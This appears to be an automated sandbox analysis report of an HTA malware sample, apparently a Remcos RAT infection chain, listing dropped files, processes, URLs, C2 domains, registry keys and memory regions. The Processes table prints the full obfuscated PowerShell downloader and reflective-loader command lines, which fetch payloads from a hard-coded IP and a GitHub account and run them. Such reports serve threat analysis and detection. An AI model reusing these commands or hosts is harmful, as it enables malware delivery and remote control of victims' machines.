Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
nicetokissthebestthingsiwantotgetmebackwith.hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
initial sample
|
||
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\seethebestpicturewithgreatthingsinlinealways[1].tiff
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (362)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\1nlzjhnh\CSC4E5E770DE006429A8ABEBD72CF3EF132.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RESE985.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Thu Oct 17 15:28:20 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aoc13cur.jnr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_atxsbzzc.rvl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dsuvbqso.kvc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fouaokqk.wff.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hgjrwynl.fin.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcrb5zit.u2b.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jla3yyhy.m0l.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2iohv0p.ot5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yu3nwkcv.iss.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqka54tf.w4o.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv97B6.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\kwva
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
There are 14 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\nicetokissthebestthingsiwantotgetmebackwith.hta"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX
ByPASS -nOp -W 1
-C DeviCEcreDentIALDePLoymENt.Exe ;
ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg
{0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText
= [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex
= {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex
-g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command
= {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly
= [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null,
@({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0},
{0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwva"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xsnewtbsktv"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE985.tmp"
"c:\Users\user\AppData\Local\Temp\1nlzjhnh\CSC4E5E770DE006429A8ABEBD72CF3EF132.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 6 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://raw.githubusercontent.com/CryptersAndToolsOf
|
unknown
|
||
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg
|
185.199.108.133
|
||
https://raw.githubusercontent.com
|
unknown
|
||
dantata.duckdns.org
|
|||
danbana.duckdns.org
|
|||
http://107.175.229.138/550/MNCCDR.txt
|
107.175.229.138
|
||
http://107.175.229.138/550/seethebestpicturewithgreatthingsinlinealways.tIF
|
107.175.229.138
|
||
https://raw.githubusercontent.com/Cryp
|
unknown
|
||
http://107.175.229.138/550/seethebestpicturewithgreatthingsinlinealways.tIFm
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
http://www.imvu.comr
|
unknown
|
||
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgt
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://login.li
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://geoplugin.net/json.gphy
|
unknown
|
||
http://www.imvu.com
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://raw.githubusercontent.com/cryptersandtoolsof
|
unknown
|
||
http://www.nirsoft.net
|
unknown
|
||
http://107.175.229.138
|
unknown
|
||
http://go.micros
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
https://www.google.com
|
unknown
|
||
http://crl.micro
|
unknown
|
||
http://geoplugin.net/json.gp/C
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://107.175.229.138/550/MNCCDX
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://geoplugin.net/json.gpge0
|
unknown
|
||
http://107.175.229
|
unknown
|
||
https://www.google.com/accounts/servicelogin
|
unknown
|
||
https://login.yahoo.com/config/login
|
unknown
|
||
http://geoplugin.net/json.gpX
|
unknown
|
||
http://www.nirsoft.net/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://www.ebuddy.com
|
unknown
|
There are 35 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
raw.githubusercontent.com
|
185.199.108.133
|
||
dantata.duckdns.org
|
192.3.101.153
|
||
danbana.duckdns.org
|
192.169.69.26
|
||
geoplugin.net
|
178.237.33.50
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
107.175.229.138
|
unknown
|
United States
|
||
185.199.108.133
|
raw.githubusercontent.com
|
Netherlands
|
||
192.169.69.26
|
danbana.duckdns.org
|
United States
|
||
192.3.101.153
|
dantata.duckdns.org
|
United States
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-UCDCW8
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-UCDCW8
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-UCDCW8
|
time
|
There are 11 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
619E000
|
trusted library allocation
|
page read and write
|
||
5F9A000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
26AE000
|
stack
|
page read and write
|
||
A5A000
|
heap
|
page read and write
|
||
A8F000
|
heap
|
page read and write
|
||
CB0000
|
heap
|
page read and write
|
||
9421000
|
trusted library allocation
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
4D17000
|
trusted library allocation
|
page read and write
|
||
2F18000
|
heap
|
page read and write
|
||
6A97000
|
heap
|
page read and write
|
||
5E2E000
|
stack
|
page read and write
|
||
303E000
|
heap
|
page read and write
|
||
5762000
|
heap
|
page read and write
|
||
3392000
|
heap
|
page read and write
|
||
54C1000
|
heap
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
71C000
|
stack
|
page read and write
|
||
5743000
|
heap
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
30EE000
|
stack
|
page read and write
|
||
7BA0000
|
trusted library allocation
|
page read and write
|
||
88CC000
|
stack
|
page read and write
|
||
7AD0000
|
trusted library allocation
|
page read and write
|
||
5879000
|
trusted library allocation
|
page read and write
|
||
5060000
|
heap
|
page read and write
|
||
3371000
|
heap
|
page read and write
|
||
7490000
|
trusted library allocation
|
page execute and read and write
|
||
ADB000
|
stack
|
page read and write
|
||
364E000
|
stack
|
page read and write
|
||
6A92000
|
heap
|
page read and write
|
||
7620000
|
trusted library allocation
|
page read and write
|
||
7888000
|
heap
|
page read and write
|
||
6A6B000
|
heap
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
868D000
|
trusted library allocation
|
page read and write
|
||
33B5000
|
heap
|
page read and write
|
||
6A4B000
|
heap
|
page read and write
|
||
54C4000
|
heap
|
page read and write
|
||
5899000
|
trusted library allocation
|
page read and write
|
||
755E000
|
stack
|
page read and write
|
||
789A000
|
heap
|
page read and write
|
||
573B000
|
heap
|
page read and write
|
||
3397000
|
heap
|
page read and write
|
||
7660000
|
trusted library allocation
|
page read and write
|
||
6A54000
|
heap
|
page read and write
|
||
80A0000
|
trusted library allocation
|
page read and write
|
||
7A80000
|
trusted library allocation
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
D93000
|
trusted library allocation
|
page execute and read and write
|
||
3390000
|
heap
|
page read and write
|
||
3294000
|
trusted library allocation
|
page read and write
|
||
2E63000
|
heap
|
page read and write
|
||
68C0000
|
direct allocation
|
page read and write
|
||
292F000
|
stack
|
page read and write
|
||
8690000
|
trusted library allocation
|
page read and write
|
||
7D4E000
|
direct allocation
|
page read and write
|
||
6911000
|
heap
|
page read and write
|
||
6A6E000
|
heap
|
page read and write
|
||
8100000
|
heap
|
page read and write
|
||
58DF000
|
stack
|
page read and write
|
||
6A8E000
|
heap
|
page read and write
|
||
794E000
|
trusted library allocation
|
page read and write
|
||
5420000
|
heap
|
page read and write
|
||
2EC7000
|
heap
|
page read and write
|
||
4DCD000
|
heap
|
page read and write
|
||
78BC000
|
heap
|
page read and write
|
||
A2E000
|
stack
|
page read and write
|
||
51FE000
|
stack
|
page read and write
|
||
7B20000
|
trusted library allocation
|
page read and write
|
||
6A92000
|
heap
|
page read and write
|
||
6DB0000
|
trusted library allocation
|
page execute and read and write
|
||
6FAE000
|
stack
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
54C1000
|
heap
|
page read and write
|
||
653D000
|
heap
|
page read and write
|
||
6AC1000
|
heap
|
page read and write
|
||
45E0000
|
heap
|
page read and write
|
||
8170000
|
heap
|
page read and write
|
||
6A97000
|
heap
|
page read and write
|
||
6A90000
|
heap
|
page read and write
|
||
A5E000
|
stack
|
page read and write
|
||
649E000
|
stack
|
page read and write
|
||
5733000
|
heap
|
page read and write
|
||
6A9D000
|
heap
|
page read and write
|
||
6E2E000
|
stack
|
page read and write
|
||
6AAC000
|
heap
|
page read and write
|
||
56E7000
|
trusted library allocation
|
page read and write
|
||
D8D000
|
stack
|
page read and write
|
||
77F0000
|
trusted library allocation
|
page read and write
|
||
D7E000
|
stack
|
page read and write
|
||
1210000
|
heap
|
page read and write
|
||
32D8000
|
heap
|
page read and write
|
||
4E29000
|
heap
|
page read and write
|
||
7670000
|
heap
|
page read and write
|
||
7A20000
|
trusted library allocation
|
page execute and read and write
|
||
1190000
|
heap
|
page read and write
|
||
87DE000
|
stack
|
page read and write
|
||
7AF0000
|
trusted library allocation
|
page read and write
|
||
6A97000
|
heap
|
page read and write
|
||
6A00000
|
heap
|
page read and write
|
||
4DF0000
|
heap
|
page read and write
|
||
7060000
|
heap
|
page read and write
|
||
6553000
|
heap
|
page read and write
|
||
7A77000
|
trusted library allocation
|
page read and write
|
||
6DDF000
|
stack
|
page read and write
|
||
517E000
|
stack
|
page read and write
|
||
2F0D000
|
heap
|
page read and write
|
||
5AB0000
|
trusted library allocation
|
page read and write
|
||
7C50000
|
trusted library allocation
|
page read and write
|
||
296E000
|
stack
|
page read and write
|
||
A421000
|
trusted library allocation
|
page read and write
|
||
6ABC000
|
heap
|
page read and write
|
||
2CCE000
|
stack
|
page read and write
|
||
7650000
|
trusted library allocation
|
page read and write
|
||
6581000
|
heap
|
page read and write
|
||
6A4F000
|
heap
|
page read and write
|
||
666B000
|
trusted library allocation
|
page read and write
|
||
FD0000
|
heap
|
page read and write
|
||
50C3000
|
trusted library allocation
|
page read and write
|
||
75EE000
|
stack
|
page read and write
|
||
7CE0000
|
direct allocation
|
page read and write
|
||
762E000
|
trusted library allocation
|
page read and write
|
||
7690000
|
trusted library allocation
|
page read and write
|
||
8A22000
|
trusted library allocation
|
page read and write
|
||
32B0000
|
heap
|
page read and write
|
||
57C3000
|
heap
|
page read and write
|
||
6C20000
|
trusted library allocation
|
page read and write
|
||
56F4000
|
heap
|
page read and write
|
||
6D3B000
|
stack
|
page read and write
|
||
6259000
|
trusted library allocation
|
page read and write
|
||
75EF000
|
trusted library allocation
|
page read and write
|
||
6A2F000
|
heap
|
page read and write
|
||
6850000
|
trusted library allocation
|
page execute
|
||
6A9D000
|
heap
|
page read and write
|
||
323E000
|
stack
|
page read and write
|
||
33B6000
|
heap
|
page read and write
|
||
3374000
|
heap
|
page read and write
|
||
54B9000
|
heap
|
page read and write
|
||
814F000
|
stack
|
page read and write
|
||
6A0A000
|
heap
|
page read and write
|
||
88BD000
|
heap
|
page read and write
|
||
5789000
|
trusted library allocation
|
page read and write
|
||
AA2000
|
heap
|
page read and write
|
||
6563000
|
heap
|
page read and write
|
||
6BEC000
|
stack
|
page read and write
|
||
8500000
|
heap
|
page read and write
|
||
B77000
|
heap
|
page read and write
|
||
75C0000
|
trusted library allocation
|
page read and write
|
||
33B9000
|
heap
|
page read and write
|
||
4B6E000
|
stack
|
page read and write
|
||
6A4B000
|
heap
|
page read and write
|
||
CFD000
|
stack
|
page read and write
|
||
4690000
|
trusted library allocation
|
page read and write
|
||
6A08000
|
heap
|
page read and write
|
||
2880000
|
heap
|
page read and write
|
||
4E60000
|
heap
|
page readonly
|
||
64F9000
|
heap
|
page read and write
|
||
3A5000
|
heap
|
page read and write
|
||
6521000
|
heap
|
page read and write
|
||
6F3A000
|
stack
|
page read and write
|
||
33C8000
|
heap
|
page read and write
|
||
6AAC000
|
heap
|
page read and write
|
||
5725000
|
heap
|
page read and write
|
||
73B0000
|
heap
|
page execute and read and write
|
||
466F000
|
stack
|
page read and write
|
||
7680000
|
trusted library allocation
|
page read and write
|
||
472E000
|
stack
|
page read and write
|
||
2E84000
|
heap
|
page read and write
|
||
4698000
|
trusted library allocation
|
page read and write
|
||
6553000
|
heap
|
page read and write
|
||
6A97000
|
heap
|
page read and write
|
||
7D40000
|
direct allocation
|
page read and write
|
||
6A6B000
|
heap
|
page read and write
|
||
74EE000
|
stack
|
page read and write
|
||
27EF000
|
stack
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
47A0000
|
heap
|
page read and write
|
||
2F86000
|
heap
|
page read and write
|
||
655D000
|
heap
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
6AAC000
|
heap
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
5762000
|
heap
|
page read and write
|
||
6E7E000
|
stack
|
page read and write
|
||
4D28000
|
trusted library allocation
|
page read and write
|
||
6A6E000
|
heap
|
page read and write
|
||
34D7000
|
heap
|
page read and write
|
||
67E0000
|
heap
|
page read and write
|
||
7AB0000
|
trusted library allocation
|
page read and write
|
||
4DB3000
|
trusted library allocation
|
page read and write
|
||
7932000
|
trusted library allocation
|
page read and write
|
||
4BFA000
|
stack
|
page read and write
|
||
90D000
|
stack
|
page read and write
|
||
76C0000
|
heap
|
page read and write
|
||
733B000
|
stack
|
page read and write
|
||
2E6F000
|
stack
|
page read and write
|
||
34D0000
|
heap
|
page read and write
|
||
6A76000
|
heap
|
page read and write
|
||
6EBD000
|
stack
|
page read and write
|
||
6A84000
|
heap
|
page read and write
|
||
6800000
|
trusted library allocation
|
page read and write
|
||
5070000
|
heap
|
page read and write
|
||
7480000
|
trusted library allocation
|
page read and write
|
||
7050000
|
heap
|
page read and write
|
||
7FE000
|
stack
|
page read and write
|
||
3390000
|
heap
|
page read and write
|
||
78C9000
|
heap
|
page read and write
|
||
